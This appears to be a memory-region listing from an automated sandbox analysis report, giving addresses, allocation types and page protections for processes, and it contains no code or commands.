7FFAAC1B6000
trusted library allocation
page read and write
16B566DE000
heap
page read and write
6EC26000
unkown
page readonly
29F5364C000
heap
page read and write
16B56694000
heap
page read and write
69EE000
stack
page read and write
6F90000
trusted library allocation
page read and write
22DBE000
trusted library allocation
page read and write
25310000
trusted library allocation
page read and write
29F53A3B000
heap
page read and write
2BE0000
heap
page read and write
29F5360B000
heap
page read and write
29F535DC000
heap
page read and write
25140000
trusted library allocation
page read and write
24FC0000
heap
page read and write
29F5360B000
heap
page read and write
7DF4BA850000
trusted library allocation
page execute and read and write
16B58DA6000
trusted library allocation
page read and write
25310000
trusted library allocation
page read and write
16B56840000
heap
page read and write
251B0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
25320000
trusted library allocation
page read and write
29F516BB000
heap
page read and write
22A0E000
stack
page read and write
7FFB1E3C5000
unkown
page readonly
696D000
stack
page read and write
7311000
heap
page read and write
25310000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
29F5362A000
heap
page read and write
4C09000
stack
page read and write
251D0000
trusted library allocation
page read and write
29F5364C000
heap
page read and write
2FD1C36000
stack
page read and write
251A0000
trusted library allocation
page read and write
25170000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
7E0C000
heap
page read and write
7130000
trusted library allocation
page read and write
22E00000
trusted library allocation
page read and write
7CD0000
trusted library allocation
page read and write
29F5360B000
heap
page read and write
2F27000
heap
page read and write
8260000
direct allocation
page read and write
29F535D8000
heap
page read and write
81D0000
trusted library allocation
page read and write
2B2B000
stack
page read and write
16B59DBB000
trusted library allocation
page read and write
7BC7000
stack
page read and write
29F5360B000
heap
page read and write
16B56990000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
7FFAAC3F0000
trusted library allocation
page read and write
29F5199E000
heap
page read and write
16B58CAA000
trusted library allocation
page read and write
29F5362B000
heap
page read and write
6DD0000
heap
page read and write
46EE000
stack
page read and write
80FC000
stack
page read and write
2900000
heap
page read and write
29F5360B000
heap
page read and write
7150000
trusted library allocation
page read and write
25140000
trusted library allocation
page read and write
7268000
heap
page read and write
29F535B9000
heap
page read and write
2FD1A7E000
stack
page read and write
473000
heap
page read and write
29F5364C000
heap
page read and write
251B0000
trusted library allocation
page read and write
29F53649000
heap
page read and write
29F538A1000
heap
page read and write
29F538A1000
heap
page read and write
29F53A3B000
heap
page read and write
251A3000
trusted library allocation
page read and write
8280000
direct allocation
page read and write
2A267AD5000
heap
page read and write
6CCE000
stack
page read and write
400000
heap
page read and write
25160000
trusted library allocation
page read and write
75C7000
heap
page read and write
7FFAAC1BC000
trusted library allocation
page execute and read and write
251B0000
trusted library allocation
page read and write
6FB0000
trusted library allocation
page read and write
251E0000
trusted library allocation
page read and write
8230000
direct allocation
page read and write
2760000
trusted library allocation
page read and write
4E0000
heap
page read and write
29F516BB000
heap
page read and write
27C0000
heap
page read and write
22E21000
heap
page read and write
7FFAAC3C0000
trusted library allocation
page read and write
6EC11000
unkown
page execute read
251A0000
trusted library allocation
page read and write
16B56900000
trusted library allocation
page read and write
72BF000
heap
page read and write
7FFAAC390000
trusted library allocation
page read and write
43AE000
stack
page read and write
2753000
trusted library allocation
page execute and read and write
25169000
trusted library allocation
page read and write
2FD14E3000
stack
page read and write
16B5A321000
trusted library allocation
page read and write
29CF000
stack
page read and write
251A0000
trusted library allocation
page read and write
25170000
trusted library allocation
page read and write
29F5362B000
heap
page read and write
442E000
stack
page read and write
CF96B5C000
stack
page read and write
29F5366E000
heap
page read and write
251C0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
29F53744000
heap
page read and write
29F535D5000
heap
page read and write
74E0000
direct allocation
page read and write
71C0000
trusted library allocation
page read and write
320D000
trusted library allocation
page execute and read and write
29F5360B000
heap
page read and write
29F51661000
heap
page read and write
29F5360B000
heap
page read and write
2EE8000
heap
page read and write
29F5366E000
heap
page read and write
6DF6000
heap
page read and write
29F5366E000
heap
page read and write
4FE5000
remote allocation
page execute and read and write
7500000
direct allocation
page read and write
29F535BD000
heap
page read and write
251B0000
trusted library allocation
page read and write
16B58220000
heap
page read and write
2FD1F3E000
stack
page read and write
29F53744000
heap
page read and write
25EE000
stack
page read and write
29F53604000
heap
page read and write
25200000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
4ABC000
stack
page read and write
6DAD000
heap
page read and write
29F53A3C000
heap
page read and write
251B0000
trusted library allocation
page read and write
229CF000
stack
page read and write
80BC000
stack
page read and write
22AB0000
remote allocation
page read and write
251B0000
trusted library allocation
page read and write
708E000
stack
page read and write
16B70985000
heap
page read and write
251A0000
trusted library allocation
page read and write
22DBB000
trusted library allocation
page read and write
22DB0000
trusted library allocation
page read and write
16B58726000
trusted library allocation
page read and write
16B58DB8000
trusted library allocation
page read and write
29F536EA000
heap
page read and write
7FFAAC1C0000
trusted library allocation
page execute and read and write
29F53493000
heap
page read and write
29F535EA000
heap
page read and write
22DCE000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
2AD8000
heap
page read and write
29F5364B000
heap
page read and write
16B68501000
trusted library allocation
page read and write
6E07000
heap
page read and write
2A267AD4000
heap
page read and write
29F534A0000
heap
page read and write
251B0000
trusted library allocation
page execute and read and write
29F5364B000
heap
page read and write
29F535D5000
heap
page read and write
321A000
trusted library allocation
page execute and read and write
29F53A3B000
heap
page read and write
2FD19FE000
stack
page read and write
29F5360B000
heap
page read and write
2A267980000
heap
page read and write
29F5360B000
heap
page read and write
251D0000
trusted library allocation
page read and write
29F535BD000
heap
page read and write
227FE000
stack
page read and write
29F538A1000
heap
page read and write
29F5366E000
heap
page read and write
2A90000
heap
page read and write
7FFAAC470000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
446F000
stack
page read and write
29F5163C000
heap
page read and write
4DFA000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
289E000
stack
page read and write
251A3000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
7580000
heap
page read and write
256F0000
trusted library allocation
page read and write
72DA000
heap
page read and write
16B5A339000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
16B582B5000
heap
page read and write
25180000
trusted library allocation
page read and write
29F5360B000
heap
page read and write
4360000
heap
page read and write
29F5364C000
heap
page read and write
29F535AD000
heap
page read and write
29F535BD000
heap
page read and write
7FFAAC110000
trusted library allocation
page read and write
81E0000
trusted library allocation
page read and write
3216000
trusted library allocation
page execute and read and write
16B5A2E3000
trusted library allocation
page read and write
29F536A9000
heap
page read and write
28B5000
heap
page read and write
2754000
trusted library allocation
page read and write
29F53120000
remote allocation
page read and write
7180000
heap
page read and write
16B584F0000
heap
page execute and read and write
251A0000
trusted library allocation
page read and write
16B56760000
heap
page read and write
29F5364C000
heap
page read and write
251B0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5364C000
heap
page read and write
16B589B6000
trusted library allocation
page read and write
692E000
stack
page read and write
251E0000
trusted library allocation
page read and write
2FD2B8B000
stack
page read and write
29F53A3B000
heap
page read and write
25310000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
16B70BF0000
heap
page read and write
322B000
trusted library allocation
page execute and read and write
29F538A1000
heap
page read and write
22B50000
direct allocation
page read and write
2A1E000
stack
page read and write
251B0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
251E0000
trusted library allocation
page execute and read and write
7BE0000
trusted library allocation
page execute and read and write
26CE000
stack
page read and write
29F5360B000
heap
page read and write
4E20000
trusted library allocation
page read and write
704E000
stack
page read and write
22CB8000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
2780000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F5364B000
heap
page read and write
251B2000
trusted library allocation
page read and write
29F5364B000
heap
page read and write
2AE2000
heap
page read and write
160000
unkown
page readonly
7120000
trusted library allocation
page execute and read and write
7D65000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
23028000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F535FE000
heap
page read and write
16B58A30000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
46AE000
stack
page read and write
29F535EA000
heap
page read and write
7FFAAC410000
trusted library allocation
page read and write
7DE0000
heap
page read and write
22E20000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
23017000
trusted library allocation
page read and write
22AEE000
stack
page read and write
41E0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
16B568A0000
heap
page read and write
251A0000
trusted library allocation
page read and write
74F0000
direct allocation
page read and write
251A0000
trusted library allocation
page read and write
72D7000
heap
page read and write
251A0000
trusted library allocation
page read and write
16B58335000
heap
page read and write
7FFAAC102000
trusted library allocation
page read and write
525E000
stack
page read and write
2FD187F000
stack
page read and write
22D90000
trusted library allocation
page read and write
167000
unkown
page readonly
29F5366E000
heap
page read and write
16B5A30C000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
4EB8000
trusted library allocation
page read and write
16B589AC000
trusted library allocation
page read and write
4520000
heap
page execute and read and write
251A0000
trusted library allocation
page read and write
27F0000
trusted library allocation
page execute and read and write
251A0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
6EC2F000
unkown
page readonly
4D00000
heap
page read and write
29F53A3C000
heap
page read and write
6EC10000
unkown
page readonly
27D8000
trusted library allocation
page read and write
44FD000
stack
page read and write
4CEC000
trusted library allocation
page read and write
39E000
stack
page read and write
6A55000
heap
page execute and read and write
251B0000
trusted library allocation
page read and write
29F53487000
heap
page read and write
228BE000
stack
page read and write
817D000
stack
page read and write
7FFAAC3D0000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
2FD2A0E000
stack
page read and write
7530000
direct allocation
page read and write
71E0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
42DE000
stack
page read and write
16B58D84000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
6D60000
heap
page read and write
25210000
trusted library allocation
page read and write
7E71000
heap
page read and write
7FFB1E3A0000
unkown
page readonly
251B0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
2A267750000
heap
page read and write
251B0000
trusted library allocation
page read and write
6FFD000
trusted library allocation
page read and write
6AF0000
heap
page read and write
251A0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
7FFAAC3B0000
trusted library allocation
page read and write
29F535DC000
heap
page read and write
29F5366E000
heap
page read and write
B7151DD000
stack
page read and write
29F535DC000
heap
page read and write
732A000
heap
page read and write
496000
heap
page read and write
72D0000
heap
page read and write
22AB0000
remote allocation
page read and write
29F538A1000
heap
page read and write
251A0000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
24FCE000
heap
page read and write
16B5669D000
heap
page read and write
16B58337000
heap
page read and write
7490000
direct allocation
page read and write
29F5364B000
heap
page read and write
7FFAAC3E0000
trusted library allocation
page read and write
52DC000
stack
page read and write
B7154FF000
unkown
page read and write
29F535BD000
heap
page read and write
68AB000
stack
page read and write
22FAB000
stack
page read and write
29F5366E000
heap
page read and write
7E78000
heap
page read and write
2FF0000
trusted library allocation
page read and write
5D0000
trusted library allocation
page read and write
251CC000
trusted library allocation
page read and write
723B000
stack
page read and write
71F0000
trusted library allocation
page read and write
6F68000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
165000
unkown
page readonly
29F53A3C000
heap
page read and write
29F534A3000
heap
page read and write
16B597D6000
trusted library allocation
page read and write
6D4E000
stack
page read and write
7FFAAC330000
trusted library allocation
page read and write
2B69000
stack
page read and write
29F5366E000
heap
page read and write
22CA0000
heap
page read and write
25E9000
stack
page read and write
22DD1000
trusted library allocation
page read and write
81C0000
trusted library allocation
page read and write
2540E000
stack
page read and write
29F5362A000
heap
page read and write
B4F5000
direct allocation
page execute and read and write
29F5364C000
heap
page read and write
3227000
trusted library allocation
page execute and read and write
29F535B7000
heap
page read and write
25140000
trusted library allocation
page read and write
3210000
trusted library allocation
page read and write
25058000
heap
page read and write
25140000
heap
page read and write
29F51661000
heap
page read and write
2E75000
heap
page read and write
4E46000
trusted library allocation
page read and write
81BC000
stack
page read and write
7FFAAC3A0000
trusted library allocation
page read and write
82B0000
direct allocation
page read and write
23036000
trusted library allocation
page read and write
23FE9000
trusted library allocation
page read and write
6E09000
heap
page read and write
29F5360B000
heap
page read and write
251A0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
25170000
trusted library allocation
page read and write
7FFAAC460000
trusted library allocation
page read and write
25230000
trusted library allocation
page read and write
2F32000
heap
page read and write
56B9000
trusted library allocation
page read and write
29F53581000
heap
page read and write
22BD9000
stack
page read and write
29F5199E000
heap
page read and write
4D88000
trusted library allocation
page read and write
7FFAAC103000
trusted library allocation
page execute and read and write
16B5A308000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
161000
unkown
page execute read
4CD4000
trusted library allocation
page read and write
6DB8000
heap
page read and write
72DA000
heap
page read and write
2F30000
heap
page read and write
24FE6000
heap
page read and write
7FFAAC300000
trusted library allocation
page read and write
25160000
trusted library allocation
page read and write
7FFAAC340000
trusted library allocation
page read and write
29F53A3C000
heap
page read and write
256D0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
2298E000
stack
page read and write
29F5366E000
heap
page read and write
7FFAAC11B000
trusted library allocation
page read and write
29F535D8000
heap
page read and write
2517D000
trusted library allocation
page read and write
16B58DD6000
trusted library allocation
page read and write
29F534A8000
heap
page read and write
29F516BB000
heap
page read and write
29F538A1000
heap
page read and write
29F536BE000
heap
page read and write
256D0000
trusted library allocation
page read and write
29F53691000
heap
page read and write
7FFAAC440000
trusted library allocation
page read and write
29F5364B000
heap
page read and write
29F51999000
heap
page read and write
56B4000
trusted library allocation
page read and write
25170000
trusted library allocation
page read and write
6E72000
heap
page read and write
29F5366E000
heap
page read and write
7FFAAC350000
trusted library allocation
page read and write
2435CD90000
heap
page read and write
4CEB000
stack
page read and write
251D0000
trusted library allocation
page read and write
251C0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5366E000
heap
page read and write
22DCA000
trusted library allocation
page read and write
2FD1E3E000
stack
page read and write
29F5360B000
heap
page read and write
25230000
trusted library allocation
page read and write
8290000
direct allocation
page read and write
6D88000
heap
page read and write
29F5362B000
heap
page read and write
251A1000
trusted library allocation
page read and write
6EC11000
unkown
page execute read
6EC2F000
unkown
page readonly
7FFAAC2C0000
trusted library allocation
page execute and read and write
22B9A000
stack
page read and write
25210000
trusted library allocation
page read and write
167000
unkown
page readonly
8210000
direct allocation
page read and write
29F53498000
heap
page read and write
29F51695000
heap
page read and write
2522D000
stack
page read and write
68EE000
stack
page read and write
251A0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
29F53484000
heap
page read and write
25170000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
22F20000
heap
page execute and read and write
16B709DB000
heap
page read and write
4BCB000
stack
page read and write
27B0000
heap
page readonly
2530E000
stack
page read and write
251B0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
251B0000
trusted library allocation
page read and write
529F000
stack
page read and write
6FF0000
trusted library allocation
page read and write
7FFB1E3B6000
unkown
page readonly
29F5166C000
heap
page read and write
16B56910000
heap
page readonly
7FC20000
trusted library allocation
page execute and read and write
7170000
trusted library allocation
page read and write
2F8000
stack
page read and write
29F535F7000
heap
page read and write
251EE000
trusted library allocation
page read and write
165000
unkown
page readonly
29F5396E000
heap
page read and write
16B589EE000
trusted library allocation
page read and write
23FC1000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
731E000
heap
page read and write
6FE0000
trusted library allocation
page read and write
228FD000
stack
page read and write
29F535EA000
heap
page read and write
29F53A3B000
heap
page read and write
29F53481000
heap
page read and write
29F5362B000
heap
page read and write
29F5360B000
heap
page read and write
29F5366E000
heap
page read and write
251A0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
7BF0000
trusted library allocation
page read and write
16B58DCC000
trusted library allocation
page read and write
48EE000
stack
page read and write
4C8E000
stack
page read and write
4710000
heap
page read and write
22E20000
heap
page read and write
29F5366E000
heap
page read and write
7480000
heap
page readonly
167000
unkown
page readonly
81F0000
trusted library allocation
page read and write
3B0000
heap
page read and write
251D0000
trusted library allocation
page read and write
16B58D70000
trusted library allocation
page read and write
4E8000
heap
page read and write
251B0000
trusted library allocation
page read and write
4620000
heap
page read and write
29F53A3B000
heap
page read and write
2FD1CB9000
stack
page read and write
16B68521000
trusted library allocation
page read and write
6A50000
heap
page execute and read and write
6DE5000
remote allocation
page execute and read and write
25AB000
stack
page read and write
251B0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page execute and read and write
5C0000
trusted library section
page read and write
29F5364B000
heap
page read and write
74B0000
direct allocation
page read and write
256D0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
22A4F000
stack
page read and write
2EE0000
heap
page read and write
2504C000
heap
page read and write
251B0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
29F535A8000
heap
page read and write
29F538A1000
heap
page read and write
251C0000
trusted library allocation
page read and write
25240000
trusted library allocation
page read and write
16B56920000
trusted library allocation
page read and write
7BD0000
heap
page read and write
29F535E5000
heap
page read and write
7180000
trusted library allocation
page read and write
161000
unkown
page execute read
251B0000
trusted library allocation
page read and write
27DB000
trusted library allocation
page read and write
72D7000
heap
page read and write
251D0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F5360B000
heap
page read and write
16B58330000
heap
page read and write
29F5364B000
heap
page read and write
29F53A3C000
heap
page read and write
16B589C0000
trusted library allocation
page read and write
16B568E0000
trusted library allocation
page read and write
29F5364B000
heap
page read and write
7DEA000
heap
page read and write
251B0000
trusted library allocation
page read and write
251C0000
trusted library allocation
page read and write
29F53A3C000
heap
page read and write
4B3E000
stack
page read and write
425F000
stack
page read and write
3BC000
heap
page read and write
29F5362A000
heap
page read and write
29F5360B000
heap
page read and write
4E92000
trusted library allocation
page read and write
82D0000
direct allocation
page read and write
275D000
trusted library allocation
page execute and read and write
7FFB1E3C0000
unkown
page read and write
2287E000
stack
page read and write
370000
heap
page read and write
16B70863000
heap
page read and write
72D3000
heap
page read and write
2FD298E000
stack
page read and write
29F5166C000
heap
page read and write
7170000
heap
page read and write
7FFAAC2E2000
trusted library allocation
page read and write
6D0E000
stack
page read and write
251B0000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
29F5366E000
heap
page read and write
3E2000
heap
page read and write
16B581C0000
heap
page execute and read and write
251D0000
trusted library allocation
page read and write
29F53A3B000
heap
page read and write
29F538A1000
heap
page read and write
251F0000
trusted library allocation
page read and write
70CE000
stack
page read and write
256D0000
trusted library allocation
page read and write
29F5362A000
heap
page read and write
3220000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5360B000
heap
page read and write
44D0000
remote allocation
page execute and read and write
29F5360B000
heap
page read and write
8BE0000
direct allocation
page execute and read and write
251A0000
trusted library allocation
page read and write
7FFAAC2D0000
trusted library allocation
page execute and read and write
4C4E000
stack
page read and write
29F5364B000
heap
page read and write
29F5362B000
heap
page read and write
72CD000
heap
page read and write
25310000
trusted library allocation
page read and write
4DD4000
trusted library allocation
page read and write
2E70000
heap
page read and write
29F53A3B000
heap
page read and write
2A5F000
stack
page read and write
2A267860000
heap
page read and write
29F5366E000
heap
page read and write
7110000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
72DA000
heap
page read and write
2435CE70000
heap
page read and write
29F535BD000
heap
page read and write
252CF000
stack
page read and write
3EF000
heap
page read and write
7260000
heap
page read and write
251A0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
75C0000
heap
page read and write
74C0000
direct allocation
page read and write
7520000
direct allocation
page read and write
29F53A3C000
heap
page read and write
7FFAAC1B0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
16B566E2000
heap
page read and write
16B5A2F9000
trusted library allocation
page read and write
29F53490000
heap
page read and write
25048000
heap
page read and write
3222000
trusted library allocation
page read and write
29F53120000
remote allocation
page read and write
29F534A8000
heap
page read and write
508E000
stack
page read and write
6ADD000
stack
page read and write
22C5E000
stack
page read and write
22940000
trusted library allocation
page read and write
16B58501000
trusted library allocation
page read and write
7FFAAC400000
trusted library allocation
page read and write
270E000
stack
page read and write
431E000
stack
page read and write
29F5366E000
heap
page read and write
2A98000
heap
page read and write
251B0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
41DE000
stack
page read and write
256D0000
trusted library allocation
page read and write
29F53A3C000
heap
page read and write
72DA000
heap
page read and write
4210000
heap
page read and write
29F53B0A000
heap
page read and write
29F538A1000
heap
page read and write
29F5366E000
heap
page read and write
45A0000
heap
page read and write
29F538A1000
heap
page read and write
2401E000
trusted library allocation
page read and write
29F53481000
heap
page read and write
7FFAAC2F0000
trusted library allocation
page execute and read and write
29F534A7000
heap
page read and write
3100000
heap
page read and write
29F535D5000
heap
page read and write
7FFB1E3A1000
unkown
page execute read
251A0000
trusted library allocation
page read and write
24AE000
unkown
page read and write
531C000
stack
page read and write
27A0000
trusted library allocation
page read and write
429C000
stack
page read and write
45E5000
remote allocation
page execute and read and write
16B58585000
trusted library allocation
page read and write
29F535EA000
heap
page read and write
251A0000
trusted library allocation
page read and write
160000
unkown
page readonly
2FD2A8D000
stack
page read and write
2E3E000
stack
page read and write
2FD1D3E000
stack
page read and write
251A0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
2FD1BBF000
stack
page read and write
16B566DC000
heap
page read and write
4591000
trusted library allocation
page read and write
29F535BD000
heap
page read and write
6F70000
heap
page execute and read and write
251B0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
29F5362A000
heap
page read and write
2435CE78000
heap
page read and write
29F53120000
remote allocation
page read and write
7FFAAC370000
trusted library allocation
page read and write
16B566A1000
heap
page read and write
72D7000
heap
page read and write
251A0000
trusted library allocation
page read and write
6A9E000
stack
page read and write
256E0000
trusted library allocation
page read and write
25320000
trusted library allocation
page read and write
29F535D5000
heap
page read and write
4686000
trusted library allocation
page read and write
23042000
trusted library allocation
page read and write
2770000
trusted library allocation
page read and write
29F5370F000
heap
page read and write
7510000
direct allocation
page read and write
8250000
direct allocation
page read and write
25190000
heap
page read and write
2B60000
heap
page read and write
29F535A7000
heap
page read and write
256D0000
trusted library allocation
page read and write
256D0000
trusted library allocation
page read and write
3212000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
251C0000
trusted library allocation
page read and write
29F535A9000
heap
page read and write
251C0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F5366E000
heap
page read and write
165000
unkown
page readonly
29F534A7000
heap
page read and write
16B5827A000
heap
page read and write
16B581C7000
heap
page execute and read and write
22FB0000
heap
page execute and read and write
4B80000
heap
page read and write
82A0000
direct allocation
page read and write
2769000
trusted library allocation
page read and write
2A26775B000
heap
page read and write
251B0000
trusted library allocation
page read and write
25077000
heap
page read and write
CF96BDF000
stack
page read and write
29F5396E000
heap
page read and write
7FFAAC220000
trusted library allocation
page execute and read and write
29F534A3000
heap
page read and write
29D000
stack
page read and write
25007000
heap
page read and write
251F0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
29F53A3B000
heap
page read and write
7DEF000
heap
page read and write
251B0000
trusted library allocation
page read and write
72D3000
heap
page read and write
71A0000
trusted library allocation
page read and write
251A0000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page execute and read and write
251B0000
trusted library allocation
page read and write
3230000
trusted library allocation
page execute and read and write
16B5A31F000
trusted library allocation
page read and write
29F53A3C000
heap
page read and write
50CE000
stack
page read and write
16B5A2E6000
trusted library allocation
page read and write
29F5360B000
heap
page read and write
7460000
heap
page read and write
29F5349C000
heap
page read and write
2FD15EE000
stack
page read and write
29F535E5000
heap
page read and write
29F538A1000
heap
page read and write
2BC000
stack
page read and write
29F5366E000
heap
page read and write
4B7F000
stack
page read and write
7FFB1E3C2000
unkown
page readonly
7CE0000
trusted library allocation
page read and write
2FE0000
trusted library allocation
page read and write
29F535EA000
heap
page read and write
29F5366E000
heap
page read and write
2AFF000
stack
page read and write
2FD18FE000
stack
page read and write
16B7095B000
heap
page read and write
4D0000
trusted library section
page read and write
29F5366E000
heap
page read and write
7175000
heap
page read and write
251A1000
trusted library allocation
page read and write
7FFAAC360000
trusted library allocation
page read and write
251D0000
trusted library allocation
page read and write
29F5362B000
heap
page read and write
43EF000
stack
page read and write
29F535EA000
heap
page read and write
29F5364C000
heap
page read and write
6D98000
heap
page read and write
7E55000
heap
page read and write
29F535EA000
heap
page read and write
25200000
trusted library allocation
page read and write
256E0000
trusted library allocation
page read and write
16B56860000
heap
page read and write
7DF8000
heap
page read and write
2A267AD0000
heap
page read and write
16B70860000
heap
page read and write
2D00000
heap
page read and write
4368000
heap
page read and write
256F0000
trusted library allocation
page read and write
251B0000
trusted library allocation
page read and write
16B70940000
heap
page read and write
2A267960000
heap
page read and write
29F5366E000
heap
page read and write
A0F5000
direct allocation
page execute and read and write
29F5361B000
heap
page read and write
22E10000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
74A0000
direct allocation
page read and write
813B000
stack
page read and write
161000
unkown
page execute read
29F5362B000
heap
page read and write
29F5366E000
heap
page read and write
16B5A42A000
trusted library allocation
page read and write
2FD2B0A000
stack
page read and write
256F0000
trusted library allocation
page read and write
6DB1000
heap
page read and write
25700000
trusted library allocation
page read and write
4BFF000
stack
page read and write
6A2D000
stack
page read and write
251B0000
trusted library allocation
page read and write
16B584C0000
heap
page execute and read and write
29F5166C000
heap
page read and write
16B56667000
heap
page read and write
29F51998000
heap
page read and write
7E03000
heap
page read and write
8270000
trusted library allocation
page execute and read and write
251B0000
trusted library allocation
page read and write
2435D010000
heap
page read and write
16B5A33B000
trusted library allocation
page read and write
4AFE000
stack
page read and write
29F5366E000
heap
page read and write
558E000
trusted library allocation
page read and write
6C8E000
stack
page read and write
251A0000
trusted library allocation
page read and write
510F000
stack
page read and write
16B589C8000
trusted library allocation
page read and write
29F538A1000
heap
page read and write
251B0000
trusted library allocation
page read and write
167000
unkown
page readonly
6EC10000
unkown
page readonly
29F51634000
heap
page read and write
25237000
trusted library allocation
page read and write
25310000
trusted library allocation
page read and write
29F534A8000
heap
page read and write
29F51653000
heap
page read and write
16B5A38F000
trusted library allocation
page read and write
22F6C000
stack
page read and write
2850000
heap
page read and write
16B589D9000
trusted library allocation
page read and write
2FD197C000
stack
page read and write
251A0000
trusted library allocation
page read and write
25170000
trusted library allocation
page read and write
16B58230000
heap
page read and write
3225000
trusted library allocation
page execute and read and write
16B5A377000
trusted library allocation
page read and write
710D000
stack
page read and write
29F5364C000
heap
page read and write
29F5366E000
heap
page read and write
7FFAAC2BA000
trusted library allocation
page read and write
29F5364C000
heap
page read and write
7FFAAC2B1000
trusted library allocation
page read and write
82E0000
direct allocation
page read and write
25710000
trusted library allocation
page read and write
16B56950000
trusted library allocation
page read and write
17D000
unkown
page readonly
29F53649000
heap
page read and write
7DE4000
heap
page read and write
4B20000
heap
page read and write
29F5362B000
heap
page read and write
72CC000
heap
page read and write
22DB6000
trusted library allocation
page read and write
16B70966000
heap
page read and write
290C000
heap
page read and write
29F5362A000
heap
page read and write
251F0000
trusted library allocation
page read and write
17D000
unkown
page readonly
25710000
trusted library allocation
page read and write
2283E000
stack
page read and write
7FFAAC2A0000
trusted library allocation
page read and write
2FD1B78000
stack
page read and write
30ED000
stack
page read and write
72A3000
heap
page read and write
29F53A3C000
heap
page read and write
2501E000
heap
page read and write
There are 1071 hidden memdumps, click here to show them.